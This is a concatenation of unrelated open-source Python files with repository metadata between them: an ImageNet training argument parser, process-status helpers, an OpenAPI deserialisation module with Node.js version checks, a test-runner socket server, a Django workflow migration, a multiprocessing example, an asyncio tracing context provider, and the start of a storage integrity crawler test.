def get_args(monitor_path='tmp.monitor.imagenet', max_iter=500000, model_save_path=None, learning_rate=1e-1, batch_size=8,
weight_decay=1e-4, accum_grad=32, tiny_mode=False, train_cachefile_dir=None, val_cachefile_dir=None,
train_list="label/train", val_list="label/val", num_threads=4):
"""
Get command line arguments.
Arguments set the default values of command line arguments.
"""
import argparse
import os
if model_save_path is None:
model_save_path = monitor_path
parser = argparse.ArgumentParser(
description='''(Tiny) ImageNet classification example.
''')
parser.add_argument("--batch-size", "-b", type=int, default=batch_size)
parser.add_argument("--accum-grad", "-a", type=int, default=accum_grad,
help='Parameters are updated by the gradient accumulated by multiple mini-batches.')
parser.add_argument("--learning-rate", "-l",
type=float, default=learning_rate)
def parse_tuple(x):
return tuple(map(int, x.split(',')))
parser.add_argument("--learning-rate-decay-at", "-D",
default=(150000, 300000, 450000), type=parse_tuple,
help='Execution point of learning rate decay with format(x1,x2,,xn). Learning rate will multiplied by 0.1 at the iteration specified.')
parser.add_argument("--monitor-path", "-m",
type=str, default=monitor_path,
help='Path monitoring logs saved.')
parser.add_argument("--max-iter", "-i", type=int, default=max_iter,
help='Max iteration of training.')
parser.add_argument("--val-interval", "-v", type=int, default=100,
help='Validation interval.')
parser.add_argument("--val-iter", "-j", type=int, default=10,
help='Each validation runs `val_iter mini-batch iteration.')
parser.add_argument("--weight-decay", "-w",
type=float, default=weight_decay,
help='Weight decay factor of SGD update.')
parser.add_argument("--device-id", "-d", type=str, default='0',
help='Device ID the training run on. This is only valid if you specify `-c cudnn`.')
parser.add_argument("--type-config", "-t", type=str, default='float',
help='Type configuration.')
parser.add_argument("--model-save-interval", "-s", type=int, default=1000,
help='The interval of saving model parameters.')
parser.add_argument("--model-save-path", "-o",
type=str, default=model_save_path,
help='Path the model parameters saved.')
parser.add_argument("--model-load-path", type=str, default=None,
help='Path to the model parameters to be loaded.')
parser.add_argument("--top-n", type=int, default=1,
help='Top-n error.')
parser.add_argument('--context', '-c', type=str,
default=None, help="Extension module. 'cudnn' is highly.recommended.")
parser.add_argument("--num-layers", "-L", type=int,
choices=[18, 34, 50, 101, 152], default=34,
help='Number of layers of ResNet.')
parser.add_argument("--shortcut-type", "-S", type=str,
choices=['b', 'c', ''], default='b',
help='Skip connection type. See `resnet_imagenet()` in model_resent.py for description.')
parser.add_argument("--tiny-mode", "-M", type=bool, default=tiny_mode,
help='The dataset is tiny imagenet.')
parser.add_argument("--train-cachefile-dir", "-T", type=str, default=train_cachefile_dir,
help='Training cache file dir. Create to use create_cache_file.py')
parser.add_argument("--val-cachefile-dir", "-V", type=str, default=val_cachefile_dir,
help='Validation cache file dir. Create to use create_cache_file.py')
parser.add_argument("--train-list", "-TL", type=str, default=train_list,
help='Training file list.')
parser.add_argument("--val-list", "-VL", type=str, default=val_list,
help='Validation file list.')
parser.add_argument("--random-area", type=parse_tuple, default=(0.08, 1.0),
help="Random area of the RandomResizedCrop augmentation.")
parser.add_argument("--num-threads", "-N", type=int, default=num_threads,
help="DALI's the number of threads.")
parser.add_argument("--checkpoint", type=str, default=None,
help='path to checkpoint file')
args = parser.parse_args()
if not os.path.isdir(args.model_save_path):
os.makedirs(args.model_save_path)
return args
|
c065a387d61a64781f659953cfca90d9e234ece6
|
847ebadf2b0e7c01ad33ce92b42528a1a5c4846c
|
/python/ovs/process.py
|
d7561310cad12892213b2e54aa7a4c4bc80b6c42
|
[
"BSD-3-Clause",
"ISC",
"Apache-2.0",
"SISSL",
"GPL-2.0-only",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
openvswitch/ovs
|
6f782527cf5fde4ccfd25e68d359b91ff41acf8a
|
bc79a7bf033fa4cda8ccfc5481db3cfccd72650c
|
refs/heads/master
| 2023-09-04T06:31:47.899017
| 2023-08-03T16:19:12
| 2023-09-01T20:15:05
| 18,383,364
| 3,366
| 2,259
|
Apache-2.0
| 2023-08-17T13:17:13
| 2014-04-02T22:15:28
|
C
|
UTF-8
|
Python
| false
| false
| 1,467
|
py
|
process.py
|
# Copyright (c) 2010, 2011 Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import signal
def _signal_status_msg(type_, signr):
s = "%s by signal %d" % (type_, signr)
for name in signal.__dict__:
if name.startswith("SIG") and getattr(signal, name) == signr:
return "%s (%s)" % (s, name)
return s
def status_msg(status):
"""Given 'status', which is a process status in the form reported by
waitpid(2) and returned by process_status(), returns a string describing
how the process terminated."""
if os.WIFEXITED(status):
s = "exit status %d" % os.WEXITSTATUS(status)
elif os.WIFSIGNALED(status):
s = _signal_status_msg("killed", os.WTERMSIG(status))
elif os.WIFSTOPPED(status):
s = _signal_status_msg("stopped", os.WSTOPSIG(status))
else:
s = "terminated abnormally (%x)" % status
if os.WCOREDUMP(status):
s += ", core dumped"
return s
|
c3543e5c701ca46e594e2f7d5a102c4de902d7f1
|
ed865aed525556fd7aa5ac5a024af720de8438e3
|
/cli/src/pcluster/api/util.py
|
2bace2ddd16172cc2d38d4689341dbb027ab4648
|
[
"Python-2.0",
"GPL-1.0-or-later",
"MPL-2.0",
"MIT",
"LicenseRef-scancode-python-cwi",
"BSD-3-Clause",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"MIT-0",
"BSD-2-Clause"
] |
permissive
|
aws/aws-parallelcluster
|
7bb33a6e175168f63a1e0acb1a9a7e9cbc405eff
|
a213978a09ea7fc80855bf55c539861ea95259f9
|
refs/heads/develop
| 2023-09-05T15:12:18.533270
| 2023-09-05T14:38:59
| 2023-09-05T14:38:59
| 19,718,034
| 520
| 226
|
Apache-2.0
| 2023-09-14T15:56:30
| 2014-05-12T22:42:19
|
Python
|
UTF-8
|
Python
| false
| false
| 8,594
|
py
|
util.py
|
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at http://aws.amazon.com/apache2.0/
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
# Generated by OpenAPI Generator (python-flask)
import datetime
import logging
import shutil
# A nosec comment is appended to the following line in order to disable the B404 check.
# In this file the input of the module subprocess is trusted.
import subprocess # nosec B404
import six
from pkg_resources import packaging
from pcluster.api import typing_utils
from pcluster.constants import NODEJS_INCOMPATIBLE_VERSION_RANGE, NODEJS_MIN_VERSION
LOGGER = logging.getLogger(__name__)
def _deserialize(data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if klass in six.integer_types or klass in (float, str, bool, bytearray):
return _deserialize_primitive(data, klass)
if klass == object:
return _deserialize_object(data)
if klass == datetime.date:
return deserialize_date(data)
if klass == datetime.datetime:
return deserialize_datetime(data)
if typing_utils.is_generic(klass):
if typing_utils.is_list(klass):
return _deserialize_list(data, klass.__args__[0])
if typing_utils.is_dict(klass):
return _deserialize_dict(data, klass.__args__[1])
return deserialize_model(data, klass)
def _deserialize_primitive(data, klass):
"""Deserializes to primitive type.
:param data: data to deserialize.
:param klass: class literal.
:return: int, long, float, str, bool.
:rtype: int | long | float | str | bool
"""
try:
value = klass(data)
except UnicodeEncodeError:
value = six.u(data)
except TypeError:
value = data
return value
def _deserialize_object(value):
"""Return an original value.
:return: object.
"""
return value
def deserialize_date(string):
"""Deserializes string to date.
:param string: str.
:type string: str
:return: date.
:rtype: date
"""
try:
from dateutil.parser import parse # pylint: disable=C0415
return parse(string).date()
except ImportError:
return string
def deserialize_datetime(string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:type string: str
:return: datetime.
:rtype: datetime
"""
try:
from dateutil.parser import parse # pylint: disable=C0415
return parse(string)
except ImportError:
return string
def deserialize_model(data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:type data: dict | list
:param klass: class literal.
:return: model object.
"""
instance = klass()
if not instance.openapi_types:
return data
for attr, attr_type in six.iteritems(instance.openapi_types):
if data is not None and instance.attribute_map[attr] in data and isinstance(data, (list, dict)):
value = data[instance.attribute_map[attr]]
setattr(instance, attr, _deserialize(value, attr_type))
return instance
def _deserialize_list(data, boxed_type):
"""Deserializes a list and its elements.
:param data: list to deserialize.
:type data: list
:param boxed_type: class literal.
:return: deserialized list.
:rtype: list
"""
return [_deserialize(sub_data, boxed_type) for sub_data in data]
def _deserialize_dict(data, boxed_type):
"""Deserializes a dict and its elements.
:param data: dict to deserialize.
:type data: dict
:param boxed_type: class literal.
:return: deserialized dict.
:rtype: dict
"""
return {k: _deserialize(v, boxed_type) for k, v in six.iteritems(data)}
def assert_valid_node_js():
_assert_node_executable()
_assert_node_version()
def _assert_node_executable():
node_exe = shutil.which("node")
LOGGER.debug("Found Node.js executable in %s", node_exe)
if not node_exe:
message = (
"Unable to find node executable. Node.js is required by the AWS CDK library used by ParallelCluster, "
"see installation instructions here: https://docs.aws.amazon.com/parallelcluster/latest/ug/install-v3.html"
)
LOGGER.critical(message)
raise Exception(message)
def _assert_node_version():
try:
# A nosec comment is appended to the following line in order to disable the B607 and B603 checks.
# It is a false positive since the PATH search is wanted and the input of the check_output is static.
# [B607:start_process_with_partial_path] Is suppressed because location of executable is retrieved from env
# PATH
# [B603:subprocess_without_shell_equals_true] Is suppressed because input of check_output is not coming from
# untrusted source
node_version_string = subprocess.check_output( # nosec B607 B603
["node", "--version"], stderr=subprocess.STDOUT, shell=False, encoding="utf-8"
)
LOGGER.debug("Found Node.js version (%s)", node_version_string)
except Exception:
LOGGER.debug("Unable to determine current Node.js version from node")
try:
# A nosec comment is appended to the following line in order to disable the B607 and B603 checks.
# It is a false positive since the PATH search is wanted and the input of the check_output is static.
# [B607:start_process_with_partial_path] Is suppressed because location of executable is retrieved from env
# PATH
# [B603:subprocess_without_shell_equals_true] Is suppressed because input of check_output is not coming from
# untrusted source
node_version_string = subprocess.check_output( # nosec B607 B603
["nvm", "current"], stderr=subprocess.STDOUT, shell=False, encoding="utf-8"
)
LOGGER.debug("Found Node.js version '%s' in use", node_version_string)
except Exception:
message = "Unable to check Node.js version"
LOGGER.critical(message)
raise Exception(message)
# `nvm current` will return `none` if no versions of Node.js are currently installed.
if node_version_string == "none":
message = (
"Node.js does not appear to be installed. Please use the Node Version Manager (nvm) to install a"
" version of Node.js compatible with this platform."
)
else:
message = (
f"Unable to invoke Node.js for the installed version {node_version_string}. This version may not be"
" compatible with this platform. Please use the Node Version Manager (nvm) to install and use a"
" compatible version of Node.js compatible with this platform."
)
LOGGER.critical(message)
raise Exception(message)
node_version = packaging.version.parse(node_version_string)
if node_version < packaging.version.parse(NODEJS_MIN_VERSION):
message = (
f"AWS CDK library used by ParallelCluster requires Node.js version >= {NODEJS_MIN_VERSION},"
" see installation instructions here: https://docs.aws.amazon.com/parallelcluster/latest/ug/install-v3.html"
)
LOGGER.critical(message)
raise Exception(message)
if (
packaging.version.parse(NODEJS_INCOMPATIBLE_VERSION_RANGE[0])
<= node_version
<= packaging.version.parse(NODEJS_INCOMPATIBLE_VERSION_RANGE[1])
):
message = (
f"AWS CDK library used by ParallelCluster requires Node.js to not be in the range"
f" {NODEJS_INCOMPATIBLE_VERSION_RANGE}, but installed Node.js version {node_version_string}"
f" is within this range, see https://docs.aws.amazon.com/cdk/v2/guide/getting_started.html"
)
LOGGER.critical(message)
raise Exception(message)
|
3dcfcd710706b9427d8059804c4636ae802ecfa9
|
68073b5bbec051890bce2cdb0abbf1c7652002ed
|
/src/robotide/contrib/testrunner/testrunner.py
|
0abbac38690969df0af5f9334afd77801b52f4c0
|
[
"Apache-2.0"
] |
permissive
|
robotframework/RIDE
|
3b6dc9629e34b6f350e154e5f76d106fa48eaaa8
|
ed4d650dbd806672401d4341fecc30274c4972c7
|
refs/heads/master
| 2023-09-05T15:59:01.151700
| 2023-09-02T22:39:16
| 2023-09-02T22:39:16
| 2,467,257
| 897
| 419
|
Apache-2.0
| 2023-09-10T03:43:39
| 2011-09-27T11:53:40
|
Python
|
UTF-8
|
Python
| false
| false
| 7,669
|
py
|
testrunner.py
|
# Copyright 2010 Orbitz WorldWide
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by NSN
# Copyright 2010-2012 Nokia Solutions and Networks
# Copyright 2013-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socketserver as SocketServer
import threading
from robotide.contrib.testrunner.Process import Process
from robotide.contrib.testrunner.TestRunnerAgent import StreamHandler
from robotide.controller.testexecutionresults import TestExecutionResults
# Solution from https://stackoverflow.com/questions/10009753/
# python-dealing-with-mixed-encoding-files
def mixed_decoder(unicode_error):
err_str = unicode_error[1]
err_len = unicode_error.end - unicode_error.start
next_position = unicode_error.start + err_len
err_hex = err_str[unicode_error.start:unicode_error.end].encode('hex')
# Alternative, return u'?', next_position
return u'%s' % err_hex, next_position # Comment this line out to get a ?
# codecs.register_error("mixed", mixed_decoder)
class TestRunner(object):
def __init__(self, project):
self._process = None
self._server = None
self._server_thread = None
self._pause_on_failure = False
self._pid_to_kill = None
self._results = TestExecutionResults()
self._port = None
self._project = project
self.profiles = {}
self._pause_longname = None
self._pause_testname = None
def enable(self, result_handler):
self._start_listener_server(result_handler)
def add_profile(self, name, item):
self.profiles[name] = item
def get_profile(self, name):
return self.profiles[name]
def get_profile_names(self):
return sorted(self.profiles.keys())
def _start_listener_server(self, result_handler):
def handle(*args):
self._result_handler(*args)
result_handler(*args)
self._server = RideListenerServer(RideListenerHandler, handle)
self._server_thread = threading.Thread(
target=self._server.serve_forever)
# DEPRECATED: self._server_thread.setDaemon(True)
self._server_thread.daemon = True
self._server_thread.start()
self._port = self._server.server_address[1]
def _result_handler(self, event, *args):
if event == 'pid':
self._pid_to_kill = int(args[0])
if event == 'port' and self._process:
self._process.set_port(args[0])
if event == 'start_test':
longname = args[1]['longname']
testname = args[0]
self._results.set_running(self._get_test_controller(longname,
testname))
self._pause_longname = longname
self._pause_testname = testname
if event == 'continue':
self._results.set_running(self._get_test_controller(
self._pause_longname, self._pause_testname))
if event == 'paused':
self._results.set_paused(self._get_test_controller(
self._pause_longname, self._pause_testname))
if event == 'end_test':
longname = args[1]['longname']
testname = args[0]
if args[1]['status'] == 'PASS':
self._results.set_passed(self._get_test_controller(longname,
testname))
elif args[1]['status'] == 'SKIP':
self._results.set_skipped(self._get_test_controller(longname,
testname))
else:
self._results.set_failed(self._get_test_controller(longname,
testname))
def _get_test_controller(self, longname, testname=None):
ret = self._project.find_controller_by_longname(longname, testname)
return ret
def clear_server(self):
self._server = None
def shutdown_server(self):
if self._server:
self._server.shutdown()
def test_execution_started(self):
self._results.test_execution_started()
def kill_process(self):
if self._process:
self._process.kill(force=True)
def send_pause_on_failure(self, pause):
if self._process:
self._process.pause_on_failure(pause)
def send_stop_signal(self):
if self._process:
self._process.kill(killer_pid=self._pid_to_kill)
def send_pause_signal(self):
if self._process:
self._process.pause()
def send_continue_signal(self):
if self._process:
self._process.resume()
def send_step_next_signal(self):
if self._process:
self._process.step_next()
def send_step_over_signal(self):
if self._process:
self._process.step_over()
def run_command(self, command, cwd):
self._pid_to_kill = None
self._process = Process(cwd)
self._process.run_command(command)
def get_output_and_errors(self, profile):
stdout, stderr, returncode = self._process.get_output(), \
self._process.get_errors(), \
self._process.get_returncode()
error, log_message = profile.format_error(stderr, returncode)
return stdout, error, log_message
def get_listener_port(self):
return self._port
def is_running(self):
return self._process and self._process.is_alive()
def command_ended(self):
self._results.set_stopped(None)
self._process = None
# The following two classes implement a small line-buffered socket
# server. It is designed to run in a separate thread, read data
# from the given port and update the UI -- hopefully all in a
# thread-safe manner.
class RideListenerServer(SocketServer.TCPServer):
"""Implements a simple line-buffered socket server"""
allow_reuse_address = True
def __init__(self, request_handler_class, callback):
SocketServer.TCPServer.__init__(self, ("", 0), request_handler_class)
self.callback = callback
class RideListenerHandler(SocketServer.StreamRequestHandler):
def handle(self):
decoder = StreamHandler(self.request.makefile('r'))
while True:
try:
(name, args) = decoder.load()
self.server.callback(name, *args)
except (EOFError, IOError):
# I should log this...
break
|
386f63d7f592cbe2f670fc27409a43abeaf9e08e
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/migrations/0047_add_workflow_models.py
|
13d10033244fc7087dea1b773e3fa2dbe01730e4
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
UTF-8
|
Python
| false
| false
| 12,562
|
py
|
0047_add_workflow_models.py
|
# Generated by Django 3.0.3 on 2020-03-03 15:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
("contenttypes", "0002_remove_content_type_name"),
("wagtailcore", "0046_site_name_remove_null"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("auth", "0011_update_proxy_permissions"),
]
operations = [
migrations.CreateModel(
name="Task",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=255, verbose_name="name")),
(
"active",
models.BooleanField(
default=True,
help_text="Active tasks can be added to workflows. Deactivating a task does not remove it from existing workflows.",
verbose_name="active",
),
),
(
"content_type",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="wagtail_tasks",
to="contenttypes.ContentType",
verbose_name="content type",
),
),
],
options={
"verbose_name": "task",
"verbose_name_plural": "tasks",
},
),
migrations.CreateModel(
name="TaskState",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"status",
models.CharField(
choices=[
("in_progress", "In progress"),
("approved", "Approved"),
("rejected", "Rejected"),
("skipped", "Skipped"),
("cancelled", "Cancelled"),
],
default="in_progress",
max_length=50,
verbose_name="status",
),
),
(
"started_at",
models.DateTimeField(auto_now_add=True, verbose_name="started at"),
),
(
"finished_at",
models.DateTimeField(
blank=True, null=True, verbose_name="finished at"
),
),
(
"content_type",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="wagtail_task_states",
to="contenttypes.ContentType",
verbose_name="content type",
),
),
(
"page_revision",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="task_states",
to="wagtailcore.PageRevision",
verbose_name="revision",
),
),
(
"task",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="task_states",
to="wagtailcore.Task",
verbose_name="task",
),
),
],
options={
"verbose_name": "Task state",
"verbose_name_plural": "Task states",
},
),
migrations.CreateModel(
name="Workflow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=255, verbose_name="name")),
(
"active",
models.BooleanField(
default=True,
help_text="Active workflows can be added to pages/snippets. Deactivating a workflow does not remove it from existing pages/snippets.",
verbose_name="active",
),
),
],
options={
"verbose_name": "workflow",
"verbose_name_plural": "workflows",
},
),
migrations.CreateModel(
name="GroupApprovalTask",
fields=[
(
"task_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Task",
),
),
],
options={
"verbose_name": "Group approval task",
"verbose_name_plural": "Group approval tasks",
},
bases=("wagtailcore.task",),
),
migrations.CreateModel(
name="WorkflowState",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"status",
models.CharField(
choices=[
("in_progress", "In progress"),
("approved", "Approved"),
("rejected", "Rejected"),
("cancelled", "Cancelled"),
],
default="in_progress",
max_length=50,
verbose_name="status",
),
),
(
"created_at",
models.DateTimeField(auto_now_add=True, verbose_name="created at"),
),
(
"current_task_state",
models.OneToOneField(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="wagtailcore.TaskState",
verbose_name="current task state",
),
),
(
"page",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_states",
to="wagtailcore.Page",
verbose_name="page",
),
),
(
"requested_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="requested_workflows",
to=settings.AUTH_USER_MODEL,
verbose_name="requested by",
),
),
(
"workflow",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_states",
to="wagtailcore.Workflow",
verbose_name="workflow",
),
),
],
options={
"verbose_name": "Workflow state",
"verbose_name_plural": "Workflow states",
},
),
migrations.CreateModel(
name="WorkflowPage",
fields=[
(
"page",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
verbose_name="page",
),
),
(
"workflow",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_pages",
to="wagtailcore.Workflow",
verbose_name="workflow",
),
),
],
options={
"verbose_name": "workflow page",
"verbose_name_plural": "workflow pages",
},
),
migrations.AddField(
model_name="taskstate",
name="workflow_state",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="task_states",
to="wagtailcore.WorkflowState",
verbose_name="workflow state",
),
),
migrations.CreateModel(
name="WorkflowTask",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"sort_order",
models.IntegerField(blank=True, editable=False, null=True),
),
(
"task",
models.ForeignKey(
limit_choices_to={"active": True},
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_tasks",
to="wagtailcore.Task",
verbose_name="task",
),
),
(
"workflow",
modelcluster.fields.ParentalKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_tasks",
to="wagtailcore.Workflow",
verbose_name="workflow_tasks",
),
),
],
options={
"verbose_name": "workflow task order",
"verbose_name_plural": "workflow task orders",
"ordering": ["sort_order"],
"abstract": False,
"unique_together": {("workflow", "task")},
},
),
migrations.AddConstraint(
model_name="workflowstate",
constraint=models.UniqueConstraint(
condition=models.Q(status="in_progress"),
fields=("page",),
name="unique_in_progress_workflow",
),
),
migrations.AddField(
model_name="groupapprovaltask",
name="groups",
field=models.ManyToManyField(
help_text="Pages/snippets at this step in a workflow will be moderated or approved by these groups of users",
to="auth.Group",
verbose_name="groups",
),
),
]
|
d79e3457f4496093b3d9d29f54c35c1c0fea6479
|
14c3c7e470e3c8048e1fa7d3466c0008577400e6
|
/Chapter03/process_pool.py
|
1481a7e9bacfb4607350c5605256f1fa7c9164ca
|
[
"MIT"
] |
permissive
|
PacktPublishing/Python-Parallel-Programming-Cookbook-Second-Edition
|
7053d7c2ac6f4c53f642e5ee23335c1102398831
|
a10f0b2ba69995a6a8697e68ae0b53a20f4c04c7
|
refs/heads/master
| 2022-10-30T19:55:23.337571
| 2022-10-28T10:13:28
| 2022-10-28T10:13:28
| 166,166,539
| 105
| 60
|
MIT
| 2021-04-23T04:11:29
| 2019-01-17T05:35:24
|
Python
|
UTF-8
|
Python
| false
| false
| 389
|
py
|
process_pool.py
|
#Using a Process Pool – Chapter 3: Process Based Parallelism
import multiprocessing
def function_square(data):
result = data*data
return result
if __name__ == '__main__':
inputs = list(range(0,100))
pool = multiprocessing.Pool(processes=4)
pool_outputs = pool.map(function_square, inputs)
pool.close()
pool.join()
print ('Pool :', pool_outputs)
|
a50606d4829c6c0e7e8ae375b078b6975e49f490
|
ac235a23f22be0d6f1818bb53902177f9969813a
|
/ddtrace/contrib/asyncio/provider.py
|
356753c1ee5f08313d035cc440d5d8ebf185bed5
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
DataDog/dd-trace-py
|
f09d6d48c4c69aea68f999fc8a458ade5c6150cf
|
1e3bd6d4edef5cda5a0831a6a7ec8e4046659d17
|
refs/heads/1.x
| 2023-09-01T20:25:26.746324
| 2023-09-01T18:54:37
| 2023-09-01T18:54:37
| 61,572,326
| 461
| 426
|
NOASSERTION
| 2023-09-14T20:38:57
| 2016-06-20T18:52:23
|
Python
|
UTF-8
|
Python
| false
| false
| 2,855
|
py
|
provider.py
|
import asyncio
from ...provider import BaseContextProvider
from ...provider import DatadogContextMixin
from ...span import Span
class AsyncioContextProvider(BaseContextProvider, DatadogContextMixin):
"""Manages the active context for asyncio execution. Framework
instrumentation that is built on top of the ``asyncio`` library, should
use this provider when contextvars are not available (Python versions
less than 3.7).
This Context Provider inherits from ``DefaultContextProvider`` because
it uses a thread-local storage when the ``Context`` is propagated to
a different thread, than the one that is running the async loop.
"""
# Task attribute used to set/get the context
_CONTEXT_ATTR = "__datadog_context"
def activate(self, context, loop=None):
"""Sets the scoped ``Context`` for the current running ``Task``."""
loop = self._get_loop(loop)
if not loop:
super(AsyncioContextProvider, self).activate(context)
return context
# the current unit of work (if tasks are used)
task = asyncio.Task.current_task(loop=loop)
if task:
setattr(task, self._CONTEXT_ATTR, context)
return context
def _get_loop(self, loop=None):
"""Helper to try and resolve the current loop"""
try:
return loop or asyncio.get_event_loop()
except RuntimeError:
# Detects if a loop is available in the current thread;
# DEV: This happens when a new thread is created from the out that is running the async loop
# DEV: It's possible that a different Executor is handling a different Thread that
# works with blocking code. In that case, we fallback to a thread-local Context.
pass
return None
def _has_active_context(self, loop=None):
"""Helper to determine if we have a currently active context"""
loop = self._get_loop(loop=loop)
if loop is None:
return super(AsyncioContextProvider, self)._has_active_context()
# the current unit of work (if tasks are used)
task = asyncio.Task.current_task(loop=loop)
if task is None:
return False
ctx = getattr(task, self._CONTEXT_ATTR, None)
return ctx is not None
def active(self, loop=None):
"""Returns the active context for the execution."""
loop = self._get_loop(loop=loop)
if not loop:
return super(AsyncioContextProvider, self).active()
# the current unit of work (if tasks are used)
task = asyncio.Task.current_task(loop=loop)
if task is None:
return None
ctx = getattr(task, self._CONTEXT_ATTR, None)
if isinstance(ctx, Span):
return self._update_active(ctx)
return ctx
|
08fffad0afc340e5644b31dada523cc73382bdf2
|
4c4deee160ee4a3056b2973f6202e5cbaafb5925
|
/tests/functional/crawler/test_integrity_crawler.py
|
d856d5750d17780f89398c3808632309efe5c967
|
[
"AGPL-3.0-only",
"LGPL-3.0-only"
] |
permissive
|
open-io/oio-sds
|
b9bc7cec283838a59b83b5279cb181cded69034f
|
08abd65aac86e47cf324826487ab9b475e014938
|
refs/heads/master
| 2023-09-05T05:09:29.653325
| 2023-08-01T16:37:37
| 2023-08-31T16:05:19
| 32,169,193
| 663
| 121
|
MIT
| 2022-03-04T13:08:03
| 2015-03-13T17:06:25
|
Python
|
UTF-8
|
Python
| false
| false
| 5,659
|
py
|
test_integrity_crawler.py
|
# Copyright (C) 2019 OpenIO SAS, as part of OpenIO SDS
# Copyright (C) 2022 OVH SAS
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library.
import tempfile
import fileinput
import os
from oio.common import exceptions
from oio.common.utils import cid_from_name, request_id
from oio.crawler.integrity import Checker, Target, DEFAULT_DEPTH, IRREPARABLE_PREFIX
from oio.event.evob import EventTypes
from tests.utils import BaseTestCase, random_str
class TestIntegrityCrawler(BaseTestCase):
def setUp(self):
super(TestIntegrityCrawler, self).setUp()
self.container = "ct-" + random_str(8)
self.obj = "obj-" + random_str(8)
self.account = "test-integrity-" + random_str(8)
self.beanstalkd0.drain_tube("oio-preserved")
reqid = request_id()
self.storage.object_create(
self.account, self.container, obj_name=self.obj, data="chunk", reqid=reqid
)
_, self.rebuild_file = tempfile.mkstemp()
self.checker = Checker(self.ns, rebuild_file=self.rebuild_file)
self.meta, chunks = self.storage.object_locate(
self.account, self.container, self.obj
)
self.chunk = chunks[0]
self.irreparable = len(chunks) == 1
self.storage.blob_client.chunk_delete(self.chunk["real_url"])
self.wait_for_event(
"oio-preserved",
reqid=reqid,
fields={"account": self.account, "user": self.container},
types=[EventTypes.CONTAINER_STATE],
)
def tearDown(self):
